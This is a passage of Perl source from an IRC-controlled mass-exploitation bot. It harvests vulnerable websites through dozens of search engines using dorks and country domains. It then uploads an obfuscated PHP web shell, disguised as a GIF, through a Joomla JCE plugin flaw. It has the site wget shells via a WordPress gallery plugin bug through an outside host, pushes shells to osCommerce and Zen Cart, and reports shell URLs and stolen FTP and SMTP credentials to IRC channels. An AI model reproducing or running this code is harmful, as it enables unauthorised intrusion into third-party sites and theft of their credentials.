				&msg("$crusher","$jcelogo15$engine 4<9=4>9 sHeLL 4<9=4>9 $crott15 (SafeMode=$safe) (OS=$os) uid=$uid ");
				&msg("$admin","$jcelogo15$engine 4<9=4>9 sHeLL 4<9=4>9 $iam15 (SafeMode=$safe) (OS=$os) uid=$uid ");
				if (defined($ftpuser)){
				&msg("$admin","$jcelogo15$engine 4<9=4>9 FTP ftp://$site15 [ $ftphost $ftpport $ftpuser $ftppass ] ");
				&msg("$channel","$jcelogo15$engine 4<9=4>9 FTP ftp://$site15 [ $ftphost $ftpport $ftpuser $ftppass ] ");
				}
				if (defined($smtpuser)){
				&msg("$admin","$jcelogo15$engine 4<9=4>9 SMTP ftp://$site15 [ $smtphost $smtpport $smtpuser $smtppass ] ");
				&msg("$channel","$jcelogo15$engine 4<9=4>9 SMTP ftp://$site15 [ $smtphost $smtpport $smtpuser $smtppass ] ");
				}
			}
			}
		} exit;
			}
		}
	}
}

sub jce_upload() {
my $success = 0;
my $url = $_[0];
$url =~ s/http:\/\///;
my $host = $url;
my $path = $url;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$path =~ s/(.*)\/[^\/]*$/\1/;
$path .= "/";
$path =~ s/([-a-zA-Z0-9\.]+)/$2/;
if ($path eq "") { $path = "/" }
$header1P = "POST ".$path."index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1"; 
$header1P2 = "POST ".$path."index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1"; 
$header2 = "Host: $host"; 
$header3 = "User-Agent: BOT/0.1 (BOT for JCE)"; 
$header4 = "Content-Type: multipart/form-data; boundary=---------------------------41184676334"; 
$header5 = "Content-Length: 4567"; 
$header6 = "-----------------------------41184676334"; 
$header7 = 'Content-Disposition: form-data; name="upload-dir"'; 
$header8 = '/'; 
$header9 = 'Content-Disposition: form-data; name="Filedata"; filename=""'; 
$header10 = 'Content-Type: application/octet-stream'; 
$header11 = 'Content-Disposition: form-data; name="upload-overwrite"'; 
$header12 = "0"; 
$header13 = 'Content-Disposition: form-data; name="Filedata"; filename="ViAr.gif"'; 
$header14 = 'Content-Type: image/gif'; 
$header15 = 'GIF89aGViAr';
$header16 = "<?php eval(gzinflate(base64_decode('rVZtT+M4EP58SPwH46uUVAsJe6eTVkDRchCOSgflmrJfAEVu4rZekjiyHdge4r/fjJ30ZWE5drUV
osm8PvPMeFyulFSJ4pVURpRTf7e7v7khJsTfElpz43eSOIrj/uDi2huzz+zOu+12f3nc3OjcCy1M
KuvSkB7ZBafOAx/DIzoMP0XDa3o2Gl0mZ4N4RG9RLcrPa+ph9M9VFI+Sq2HfGYxlNgcLyjJG5qyc
EvDgqSE3JYZGf4pmmk14sZtxMP0oSpFMAaWHwqSQGfcW+BeGXfLY0TytlTBzCB8fnUbJ+eAkggCD
01O6/7S5wXPNX7G6ACObmquKqx5knEltxvOSFdxfVOS57+To5GQINDU18zsjFQT5ltMwOh+MohWn
goncpzkrU17eBQXLmdEfpygNUlnQbUItU3SbnjEtcvIntoWVZGZMtReGLVfAWlvOTdm/JDFX9xyB
NFXclASkfUuxVCBusVKL/Fnbmy4vyXpm8e6dZUlM/HZ0/opG116ay5Lj2ODUaFmrlK/OgRcfD/uX
o+S0/3d0cXQeeXYWMq6NIL2l1cng+Oo8uhglw8Fg5N0GNBQFm3IdaoAs4HsiZYb/DFdBNatwVBR3
XLuk28RF7boqfuIc7b1pjvbcHIFROpOEHhhhcn74SRwpskPiGc/zg9DJDsbqEPE3hhMJZ0yLf3nv
N5LKHJr16wf7AcNDGiyyBfQgHC+cOyBMauh1j/o0gOISEAAjxgr9bkC7b81xBQ4AvxZZz0Yq5vAI
ERYpAkqmS+X0a+UqrDflw7ZBQoqNTGrbxO56mEldpkbIklQPkIzgaKUPmTtmKYrcIHbqnjZKVVL7
qN/2Qs/OoVVtoS7npVV1d96jQnFTq5KgJADjtqePK3I75I38pRQ3N9+TA6y/naRJhJR5QJkqSIFb
BJi+xLVKmOWgR+nh64Qey6JgZdYSeCDKqjbEzCveo4Z/MZQgxz2aFhld18b1uBBLvYtDyT3La/t+
B/YhIjv09teRcmiQDVHUuREVU8ba7WTMsBZ5Ww5W8z8lXFW5ZBk5FTm3ZYRo/ayamcgyXjZotcO+
ZjAB/0aNs4mvtMn5wUV7FcUFf7Dee2QVxEp8ZNN5v/+jyVPyB3ygJM2Z1j3D1hwcyEZHx2bBrSt4
jd6VzYqMXXvOud2ttfXIBC75ankGtjoWR+vTwAGnR6uwuxiXb3zttZR4t2BnjewcFvKeJy46zxI0
8F90MUWVODfYtQs0gU3TgPkpobBat0faqYDLkWe4F56IW8FkTR/Xacq1JgZEwdfhYHntXRK6T57s
aXtGcjP0LctwRixljbLI7IXVrLVK8dUJ+r2doF37gWWtcc8n/AtPfYxkt5obohB96dpqWb9GiyUE
2WBYKn4UgvwuDGrSQlATAIDNSuzNAt5ws2i4aIIQ/uB9Iqa1YnjI7W3cbQGC5+qvCPIDqL1ck52c
eS8C/w8='))); ?> ";
$header17 = 'Content-Disposition: form-data; name="upload-name"'; 
$header18 = 'ViAr'; 
$header19 = 'Content-Disposition: form-data; name="action"'; 
$header20 = 'upload'; 
$header21 = "-----------------------------41184676334--"; 
$header22 = 'X-Request: JSON'; 
$header23 = 'Content-Type: application/x-www-form-urlencoded; charset=utf-8'; 
$header25 = 'json={"fn":"folderRename","args":["/ViAr.gif","peruzak.php"]}'; 
$header24 = "Content-Length: ".length($header25)."";
my $remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$host" ,PeerPort=>"80") || return;
print $remote "$header1P\n$header2\n$header3\n$header4\n$header5\n\n$header6\n$header7\n\n$header8\n$header6\n$header9\n$header10\n\n\n$header6\n$header11\n\n$header12\n$header6\n$header13\n$header14\n\n$header15\n$header16\n$header6\n$header17\n\n$header18\n$header6\n$header19\n\n$header20\n$header21\n\n";
my $remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$host" ,PeerPort=>"80") || return;
print $remote "$header1P2\n$header2\n$header3\n$header23\n$header22\n$header24\n\n$header25\n\n";
while ($hasil = <$remote>) {
if ($hasil =~ /200 OK/) {
$success = 1;
}
return $success;
}
}

sub rfg_exploit() {
	my $chan = $_[0];
	my $bugz = $_[1];
	my $dork = $_[2];
	my $engine = $_[3];
	my $nick = $_[4];
	my $count = 0;
	my @totexploit = &search_engine($chan,$bugz,$dork,$engine,$rfglogo);
	my $num = scalar(@totexploit);
	if ($num > 0){
		foreach my $site(@totexploit){
		$count++;
		if ($count == $num-1) { &msg("$chan","$rfglogo15$engine 9Finished Gan..."); }
			my $test  = "http://garguritos.com/rfg.php?url=http://".$site;
				my $html  = &get_content($test);
				if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
				my $vpath = "wp-content/plugins/radykal-fancy-gallery/admin/";
				if ($html =~ /<a href=\"http:\/\/(.*)$vpath(.*)\">Your shell/){
					my $vuln = $1; my $qr = $2;
					my $upl = "http://".$vuln.$vpath.$qr."wget%20".$thumbshell;
					my $crut = &get_content($upl);
					if ($crut =~ /3xploit/) {
					my $shell = "http://".$vuln.$vpath."bad.php";
					my $check = &get_content($shell);
					if ($check =~ /coreunix/i){
						my $safe = ""; my $os = ""; my $uid = "";
						if ($check =~ m/SAFE_MODE: <b><font color=blue>(.*?)<\/font>/) {$safe = $1;}
						if ($check =~ m/color=red><b>&nbsp;&nbsp;&nbsp;(.*?)<br>/) {$os = $1;}
						if ($check =~ m/uid=(.*?)gid=/) {$uid = $1;}
						&msg("$chan","$rfglogo4TARGET1 12SEND 3TO 13$nick Selamatt Yaaa... ^_^ 4<9=4>");
						&msg("$admin","$rfglogo15$engine 4<9=4>9 sHeLL 4<9=4>9 ".$shell."15 (SafeMode=$safe) (OS=$os) uid=$uid ");
						&msg("$nick","$rfglogo15$engine 4<9=4>9 sHeLL 4<9=4>9 ".$shell."15 (SafeMode=$safe) (OS=$os) uid=$uid ");
					} else {
						&msg("$chan","$rfglogo15$engine 4<9=4>9 VulN 4<9=4>9 http://".$vuln.$vpath.$qr."15 ");
					}
					}
				}
			} exit; }
		}
	}
}

##################################################################################

sub search_engine() {
    my (@total,@clean);
    my $chan = $_[0];
    my $bug = $_[1];
    my $dork = $_[2];
    my $engine = $_[3];
    my $logo = $_[4];
	if ($gps == 1) {
    if ($engine eq "Commercial") { my @commercial = &jack($dork."+site:com"); push(@total,@commercial); }
    if ($engine eq "Network") { my @network = &jack($dork."+site:net"); push(@total,@network); }
    if ($engine eq "UniTed") { my @united = &jack($dork."+site:us"); push(@total,@united); }
    if ($engine eq "Thailand") { my @thailand = &jack($dork."+site:th"); push(@total,@thailand); }
    if ($engine eq "Morocco") { my @morocco = &jack($dork."+site:ma"); push(@total,@morocco); }
    if ($engine eq "France") { my @france = &jack($dork."+site:fr"); push(@total,@france); }
    if ($engine eq "Indonesia") { my @indonesia = &jack($dork."+site:id"); push(@total,@indonesia); }
    if ($engine eq "Samoa") { my @samoa = &jack($dork."+site:ws"); push(@total,@samoa); }
    if ($engine eq "Poland") { my @poland = &jack($dork."+site:pl"); push(@total,@poland); }
    if ($engine eq "Russian") { my @rusia = &jack($dork."+site:ru"); push(@total,@rusia); }
    if ($engine eq "Romania") { my @romania = &jack($dork."+site:ro"); push(@total,@romania); }
    if ($engine eq "Territory") { my @territory = &iamz($dork."+site:io"); push(@total,@territory); }
    if ($engine eq "Czech") { my @czech = &iamz($dork); push(@total,@czech); }
    if ($engine eq "Brazil") { my @brazil = &iamz($dork."+site:br"); push(@total,@brazil); }
    if ($engine eq "Turkey") { my @turkey = &iamz($dork."+site:tr"); push(@total,@turkey); }
    if ($engine eq "Ukraine") { my @ukraine = &iamz($dork."+site:ua"); push(@total,@ukraine); }
    if ($engine eq "Chile") { my @chile = &iamz($dork."+site:cl"); push(@total,@chile); }
    if ($engine eq "Sweden") { my @sweden = &iamz($dork."+site:se"); push(@total,@sweden); }
    if ($engine eq "Italy") { my @italy = &iamz($dork."+site:it"); push(@total,@italy); }
    if ($engine eq "Hungary") { my @hungary = &iamz($dork."+site:hu"); push(@total,@hungary); }
    if ($engine eq "Australia") { my @australia = &iamz($dork."+site:au"); push(@total,@australia); }
    if ($engine eq "Netherlands") { my @netherlands = &iamz($dork."+site:nl"); push(@total,@netherlands); }
    if ($engine eq "Andorra") { my @andorra = &cemonk($dork."+site:ad"); push(@total,@andorra); }
    if ($engine eq "Helena") { my @helena = &cemonk($dork."+site:sh"); push(@total,@helena); }
    if ($engine eq "Portugal") { my @portugal = &cemonk($dork."+site:pt"); push(@total,@portugal); }
    if ($engine eq "Israel") { my @israel = &cemonk($dork."+site:il"); push(@total,@israel); }
    if ($engine eq "Argentina") { my @argentina = &cemonk($dork."+site:ar"); push(@total,@argentina); }
    if ($engine eq "Belarus") { my @belarus = &cemonk($dork."+site:by"); push(@total,@belarus); }
    if ($engine eq "Moldova") { my @moldova = &cemonk($dork."+site:md"); push(@total,@moldova); }
    if ($engine eq "Cocos") { my @cocos = &cemonk($dork."+site:cc"); push(@total,@cocos); }
    if ($engine eq "Mexico") { my @mexico = &cemonk($dork); push(@total,@mexico); }
    if ($engine eq "Bulgaria") { my @bulgaria = &cemonk($dork."+site:bg"); push(@total,@bulgaria); }
    if ($engine eq "Bolivia") { my @bolivia = &cemonk($dork."+site:bo"); push(@total,@bolivia); }
    if ($engine eq "Slovenia") { my @slovenia = &semangad($dork."+site:si"); push(@total,@slovenia); }
    if ($engine eq "Switzerland") { my @switzerland = &semangad($dork."+site:ch"); push(@total,@switzerland); }
    if ($engine eq "Latvia") { my @latvia = &semangad($dork."+site:lv"); push(@total,@latvia); }
    if ($engine eq "Kenya") { my @kenya = &semangad($dork."+site:ke"); push(@total,@kenya); }
    if ($engine eq "Singapore") { my @singapore = &semangad($dork."+site:sg"); push(@total,@singapore); }
    if ($engine eq "Kazakhstan") { my @kazakhstan = &semangad($dork."+site:kz"); push(@total,@kazakhstan); }
    if ($engine eq "Vietnam") { my @vietnam = &semangad($dork."+site:vn"); push(@total,@vietnam); }
    if ($engine eq "Lithuania") { my @lithuania = &semangad($dork."+site:lt"); push(@total,@lithuania); }
    if ($engine eq "Kingdom") { my @kingdom = &semangad($dork."+site:uk"); push(@total,@kingdom); }
    if ($engine eq "Spain") { my @spain = &semangad($dork."+site:es"); push(@total,@spain); }
    if ($engine eq "Germany") { my @germany = &semangad($dork."+site:de"); push(@total,@germany); }
    if ($engine eq "Organization") { my @organization = &punta($dork."+site:org"); push(@total,@organization); }
    if ($engine eq "Canada") { my @canada = &punta($dork."+site:ca"); push(@total,@canada); }
    if ($engine eq "Information") { my @information = &punta($dork."+site:info"); push(@total,@information); }
    if ($engine eq "Mozambique") { my @mozambique = &punta($dork."+site:mz"); push(@total,@mozambique); }
    if ($engine eq "Iceland") { my @iceland = &punta($dork."+site:is"); push(@total,@iceland); }
    if ($engine eq "Austria") { my @austria = &punta($dork."+site:at"); push(@total,@austria); }
    if ($engine eq "Greece") { my @greece = &punta($dork."+site:gr"); push(@total,@greece); }
    if ($engine eq "India") { my @india = &punta($dork."+site:in"); push(@total,@india); }
    if ($engine eq "Malaysia") { my @malaysia = &punta($dork."+site:my"); push(@total,@malaysia); }
    if ($engine eq "Europe") { my @europe = &punta($dork."+site:eu"); push(@total,@europe); }
    if ($engine eq "Japan") { my @japan = &punta($dork."+site:jp"); push(@total,@japan); }
    if ($engine eq "Proffessional") { my @proffessional = &punta($dork."+site:pro"); push(@total,@proffessional); }
    if ($engine eq "Biz") { my @biz = &punta($dork."+site:biz"); push(@total,@biz); }
    if ($engine eq "Ask2") { my @ask2 = &ask2($dork); push(@total,@ask2); }
    if ($engine eq "GiGaBLaST") { my @gigablast = &gigablast($dork,$chan); push(@total,@gigablast); } 
    if ($engine eq "SnZ") { my @snz = &snz($dork,$chan); push(@total,@snz); } 
    if ($engine eq "CaDa") { my @cada = &cada($dork,$chan); push(@total,@cada); } 
    if ($engine eq "GuTSeR") { my @gutser = &gutser($dork,$chan); push(@total,@gutser); } 
    	}
	if ($gps2 == 1) {
    if ($engine eq "WeBCrawLeR") { my @webcrawler = &webcrawler($dork); push(@total,@webcrawler); }
    if ($engine eq "PaGiNa") { my @pagina = &pagina($dork); push(@total,@pagina); }
    if ($engine eq "WitCh") { my @witch = &witch($dork); push(@total,@witch); }
    if ($engine eq "aMidaLLa") { my @amidalla = &amidalla($dork); push(@total,@amidalla); }
    if ($engine eq "KvaSiR") { my @kvasir = &kvasir($dork); push(@total,@kvasir); }
    if ($engine eq "BaiDu") { my @baidu = &baidu($dork); push(@total,@baidu); }
    if ($engine eq "GiBLa") { my @gibla = &gibla($dork); push(@total,@gibla); }
    if ($engine eq "MyWeBSearcH") { my @mywebsearch = &mywebsearch($dork); push(@total,@mywebsearch); }
    if ($engine eq "DogPile") { my @dogpile = &dogpile($dork); push(@total,@dogpile); }
    if ($engine eq "TeoMa") { my @teoma = &teoma($dork); push(@total,@teoma); }
    if ($engine eq "VolUnIa") { my @volunia = &volunia($dork); push(@total,@volunia); }
    if ($engine eq "IzItO") { my @izito = &izito($dork); push(@total,@izito); }
    if ($engine eq "WaLLa") { my @walla = &walla($dork); push(@total,@walla); }
    if ($engine eq "YaHoo") { my @yahoo = &yahoo($dork); push(@total,@yahoo); }
    if ($engine eq "AsK") { my @ask = &ask($dork); push(@total,@ask); }
    if ($engine eq "Bing") { my @bing = &bing($dork); push(@total,@bing); }
    if ($engine eq "UoL") { my @uol = &uol($dork,$chan); push(@total,@uol); }
    if ($engine eq "OnEt") { my @onet = &onet($dork); push(@total,@onet); }
    if ($engine eq "GooGLe") { my @google = &google($dork); push(@total,@google); }
    if ($engine eq "GooGLe2") { my @google2 = &google2($dork); push(@total,@google2); }
    if ($engine eq "CLusTy") { my @clusty = &clusty($dork); push(@total,@clusty); }
    if ($engine eq "SaPo") { my @sapo = &sapo($dork); push(@total,@sapo); }
    if ($engine eq "AoL") { my @aol = &aol($dork); push(@total,@aol); }
    if ($engine eq "LyCos") { my @lycos = &lycos($dork); push(@total,@lycos); }
    if ($engine eq "RiCeRca") { my @ricerca = &ricerca($dork); push(@total,@ricerca); }
    if ($engine eq "AnAnZi") { my @ananzi = &ananzi($dork); push(@total,@ananzi); }
    if ($engine eq "AmFibi") { my @amfibi = &amfibi($dork); push(@total,@amfibi); }
    if ($engine eq "HotBot") { my @hotbot = &hotbot($dork); push(@total,@hotbot); }
    if ($engine eq "SeZNam") { my @seznam = &seznam($dork); push(@total,@seznam); }
    if ($engine eq "BigLobe") { my @biglobe = &biglobe($dork); push(@total,@biglobe); }
    if ($engine eq "AvG") { my @avg = &avg($dork); push(@total,@avg); }
    if ($engine eq "FiReBaLL") { my @fireball = &fireball($dork); push(@total,@fireball); }
    if ($engine eq "DmoZ") { my @dmoz = &dmoz($dork); push(@total,@dmoz); }
    if ($engine eq "YahooHK") { my @yahoohk = &yahoohk($dork); push(@total,@yahoohk); }
    if ($engine eq "ByPass") { my @bypass = &bypass($dork); push(@total,@bypass); }
    if ($engine eq "ByPass2") { my @bypass2 = &bypass2($dork); push(@total,@bypass2); }
    if ($engine eq "RambLer") { my @rambler = &rambler($dork,$chan); push(@total,@rambler); } 
    if ($engine eq "MaMa") { my @mama = &mama($dork,$chan); push(@total,@mama); } 
    if ($engine eq "Msn") { my @msn = &msn($dork,$chan); push(@total,@msn); } 
    if ($engine eq "iamSeaCrh") { my @iamsearch = &iamsearch($dork,$chan); push(@total,@iamsearch); } 
    if ($engine eq "PaPa") { my @papa = &papa($dork,$chan); push(@total,@papa); } 
    if ($engine eq "NadJi") { my @nadji = &nadji($dork,$chan); push(@total,@nadji); } 
	}
    @clean = &clean(@total);
    if ($silentmode == 0) {
    &msg("$chan","$logo15$engine 4<9=4>9 Total:4 [15".scalar(@total)."4] 9 Clean:4 [15".scalar(@clean)."4] "); }
    return @clean;
}
##################################################################################
sub isFound() {
    my $status = 0;
    my $link = $_[0];
    my $reqexp = $_[1];
    my $res = &get_content($link);
    if ($res =~ /$reqexp/) { $status = 1 }
    return $status;
}

sub get_content() {
    my $url = $_[0];
    my $ua = LWP::UserAgent->new(agent => $uagent);
    $ua->timeout($timot);
    my $req = HTTP::Request->new(GET => $url);

    my $res = $ua->request($req);
    return $res->content;
}

sub osc_upl_query() {
    my $url = $_[0];
    my $ua  = LWP::UserAgent->new(agent => $uagent);
    $ua->timeout(20);
    my $req = $ua->post($url,
      Content_Type=>'form-data',
      Content=>["products_image"=>["$osc_shell"]]);
    return $req->content;
}

sub zen_upl_query() {
    my $url = $_[0];
    my $ua  = LWP::UserAgent->new(agent => $uagent);
    $ua->timeout(20);
    my $req = $ua->post($url,
      Content_Type=>'multipart/form-data',
      Content=>["products_image"=>["$osc_shell"]]);
    return $req->content;
}

sub iam_dumper_query() {
    my $url = $_[0];
    my $ua  = LWP::UserAgent->new(agent => $uagent);
    $ua->timeout(20);
    my $req = $ua->post($url,
      Content_Type=>'multipart/form-data',
      Content=>["products_image"=>["$iam_dumper"]]);
    return $req->content;
}
######################################### SEARCH ENGINE

sub jack() {
    my @list;
    my $key = $_[0];
    for (my $i=0; $i<=1000; $i+=100){
        my $search = ($jack.&key($key)."&num=100&filter=0&start=".$i);
        my $res = &search_engine_query($search);
        while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
            my $link = $1;
            if ($link !~ /google/){
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}

sub iamz() {
    my @list;
    my $key = $_[0];
    for (my $i=0; $i<=1000; $i+=100){
        my $search = ($iamz.&key($key)."&num=100&filter=0&start=".$i);
        my $res = &search_engine_query($search);
        while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
            my $link = $1;
            if ($link !~ /google/){
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}

sub cemonk() {
    my @list;
    my $key = $_[0];
    for (my $i=0; $i<=1000; $i+=100){
        my $search = ($cemonk.&key($key)."&num=100&filter=0&start=".$i);
        my $res = &search_engine_query($search);
        while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
            my $link = $1;
            if ($link !~ /google/){
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}

sub semangad() {
    my @list;
    my $key = $_[0];
    for (my $i=0; $i<=1000; $i+=100){
        my $search = ($semangad.&key($key)."&num=100&filter=0&start=".$i);
        my $res = &search_engine_query($search);
        while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
            my $link = $1;
            if ($link !~ /google/){
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}

sub punta() {
    my @list;
    my $key = $_[0];
    for (my $i=0; $i<=1000; $i+=100){
        my $search = ($punta.&key($key)."&num=100&filter=0&start=".$i);
        my $res = &search_engine_query($search);
        while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
            my $link = $1;
            if ($link !~ /google/){
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}

sub papa() {
    my @list;
    my $key = $_[0];
    for (my $i=0; $i<=1000; $i+=100){
        my $search = ("https://www.google.as/#output=search&sclient=psy-ab&q=".&key($key)."&num=100&filter=0&start=".$i);
        my $res = &search_engine_query($search);
        while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
            my $link = $1;
            if ($link !~ /google/){
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}

sub najdi() { 
	my @list;
	my $key = $_[0];
	for ($b=1; $b<=500; $b+=10) {
	    $num += $num;
        my $search = ("http://www.najdi.si/search.jsp?q=".&key($key)."&o=".$b."&maxHitsPerGroup=".$num);
        my $res = search_engine_query($search);
        while ($res =~ m/<a href=\"http:\/\/(.+?)\" onmousedown/g) {
            if ($1 !~ /najdi|cache/){
            my $link = $1;
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}

sub ask2() {
  my @list;
    my $key = $_[0];
    for (my $i=1; $i<=50; $i+=1) {
        my $search = ("http://it.ask.com/web?q=".uri_escape($key)."&qsrc=0&o=0&l=dir&qid=EE90DE6E8F5370F363A63EC61228D4FE&page=".$i."&jss=1&dm=all");
        my $res = &search_engine_query($search);
		if ($res !~ /Successiva/) {$i=50;}
        while ($res =~ m/href=\"http:\/\/(.+?)\" onmousedown=\"/g) {
            if ($1 !~ /ask\.com/){
            my $link = $1;
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
 }

sub google() {
    my @list;
    my $key = $_[0];
    for (my $i=0; $i<=1000; $i+=100){
        my $search = ("http://www.google.com/search?q=".&keys($key)."&num=100&filter=0&start=".$i);
        my $res = &search_engine_query($search);
        while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
            my $link = $1;
            if ($link !~ /google/){
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}

sub walla() {
	my @list;
	my $key = $_[0];
	for ($b=0; $b<=100; $b+=1) {
        my $search = ("http://search.walla.co.il/?q=".&keys($key)."&type=text&page=".$b);
        my $res = &search_engine_query($search);
        while ($res =~ m/<a href=\"http:\/\/(.+?)\" title=/g) {
            my $link = $1;
            if ($link !~ /walla\.co\.il/){
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}

sub yahoo(){
    my @list;
	my $key = $_[0];
	for ($b=1; $b<=1000; $b+=10) {
        my $search = ("http://search.yahoo.com/search?p=".&keys($key)."&b=".$b);
        my $res = &search_engine_query($search);
        while ($res =~ m/http\%3a\/\/(.+?)\"/g) {
            my $link = $1;
            if ($link !~ /yahoo\.com/){
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}

sub yahoohk(){
    my @list;
    my $key = $_[0];
    my $chan = $_[1];
    my $b   = 0;
	for ($b=1; $b<=500; $b+=10) {
        my $search = ("http://hk.search.yahoo.com/search?p=".&key($key)."&b=".$b);
        my $res = &search_engine_query($search);
        while ($res =~ m/http\%3a\/\/(.+?)\"/g) {
            if ($1 !~ /hk.search.yahoo.com/){
            my $link = $1;
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}

sub fireball() {
    my @list;
    my $key = $_[0];
    for ($i=1;$i<=1000;$i+=100){
        my $search = ("http://www.fireball.de/ajax.asp?q=".$key."&lang=de".$i);
        my $res = &search_engine_query($search);
        while ($res =~ m/<a href=\"http:\/\/(.*?)\" target/g) {
            my $link = $1;
            if ($1 !~ /ergab keine Treffer in Deutsche Seiten/){
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}

sub avg() {
    my @list;
    my $key = $_[0];
    for (my $i=0; $i<=1000; $i+=100) {
        my $search = ("http://isearch.avg.com/search?q=".key($key)."&sap=hp&lang=unknown&mid=unknown&cid=unknown&v=unknown&ds=unknown&d=1%2F1%2F2000+12%3A00%3A00+AM&pr=unknown&snd=".$i);
        my $res = &search_engine_query($search);
        while ($res =~ m/href=\"http:\/\/(.+?)\//g) {
            if ($1 !~ /avg\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
			}
        }
    }
    return @list;
}

sub dmoz() {
    my @list;
    my $key = $_[0];
    for (my $i=0; $i<=1000; $i+=100){
        my $search = ("http://www.dmoz.org/search?q=".key($key)."&cat=all&all=".$i);
        my $res = search_engine_query($search);
        while ($res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g) {
            my $link = $1;
            if ($link !~ /dMoz/){
                my @grep = links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}

sub ask() {
	my @list;
	my $key = $_[0];
	for (my $i=1; $i<=1000; $i+=100) {
		my $search = ("http://uk.ask.com/web?q=".&keys($key)."&qsrc=1&frstpgo=0&o=0&l=dir&qid=05D10861868F8C7817DAE9A6B4D30795&page=".$i."&jss=");
		my $res = &search_engine_query($search);
		while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) {
            my $link = $1;
			if ($link !~ /ask\.com/){
				my @grep = &links($link);
				push(@list,@grep);
			}
		}
	}
	return @list;
}

sub onet() {
	my @list;
	my $key = $_[0];
	my $b   = 0;
	for ($b=1; $b<=400; $b+=10) {
		my $search = ("http://szukaj.onet.pl/".$b.",query.html?qt=".&key($key));
		my $res = &search_engine_query($search);
		while ($res =~ m/<a href=\"http:\/\/(.*?)\">/g) {
			my $link = $1;
			if ($link !~ /onet|webcache|query/){
				my @grep = &links($link);
                push(@list,@grep);
			}
		}
	}
	return @list;
}

sub clusty() {
    my @list;
	my $key = $_[0];
    my $b   = 0;
	for ($b=10; $b<=200; $b+=10) {
        my $search = ("http://search.yippy.com/search?input-form=clusty-simple&v%3Asources=webplus-ns-aaf&v%3Aproject=clusty&query=".&keys($key)."&v:state=root|root-".$b."-20|0&");
        my $res = &search_engine_query($search);
		if ($res !~ /next/) {$b=100;}
        while ($res =~ m/<a href=\"http:\/\/(.*?)\"/g) {
            my $link = $1;
            if ($1 !~ /yippy\.com/){
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}

sub bing() {
    my @list;
    my $key = $_[0];
    for (my $i=1; $i<=400; $i+=10) {
        my $search = ("http://www.bing.com/search?q=".&keys($key)."&first=".$i);
        my $res = &search_engine_query($search);
        while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) {
			my $link = $1;
            if ($link !~ /google/) {
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}

sub gutser() {
    my @list;
    my $key = $_[0];
    for ($b=1; $b<=50; $b+=1) {
        my $search = ("http://www.goodsearch.com/Search.aspx?Keywords=".&key($key)."&page=".$b."&osmax=0");
        my $res = &search_engine_query($search);
        while ($res =~ m/http:\/\/([^>\"]*)\">/g) {
            if ($1 !~ /goodsearch|good\.is|w3\.org|quantserve/){
            my $link = $1;
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}

sub sapo(){
    my @list;
	my $key = $_[0];
	for ($b=1; $b<=50; $b+=1) {
        my $search = ("http://pesquisa.sapo.pt/?barra=resumo&cluster=0&format=html&limit=10&location=pt&page=".$b."&q=".&keys($key)."&st=local");
        my $res = &search_engine_query($search);
		if ($res !~ m/Next/i) {$b=50;}
        while ($res =~ m/<a href=\"http:\/\/(.*?)\"/g) {
            my $link = $1;
            if ($1 !~ /\.sapo\.pt/){
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}

sub lycos() { 
  my @list;
  my $key = $_[0];
    for ($b=0; $b<=50; $b+=1) {
        my $search = ("http://search.lycos.com/web?q=".&keys($key)."&pn=".$b);
        my $res = &search_engine_query($search);
        while ($res =~ m/title=\"http:\/\/(.*?)\"/g) {
            my $link = $1;
            if ($link !~ /lycos\.com/){
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;	
}

sub uol() {
	my @list;
	my $key = $_[0];
	my $chan = $_[1];
	for ($b=0; $b<=1000; $b+=10) {
        my $search = ("http://busca.uol.com.br/web/?ref=homeuol&q=".&keys($key)."&start=".$b);
        my $res = &search_engine_query($search);
	if ($res =~ m/retornou nenhum resultado/i) {$b=500;}
        while ($res =~ m/href=\"?http:\/\/([^\">]*)\"/g) {
            my $link = $1;
            if ($link !~ /uol\.com\.br|\/web/i){
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    sendraw("MODE $chan -m"); 
    &msg("$chan","13scanning done.... Silahkan Scan KemBali!!!15");
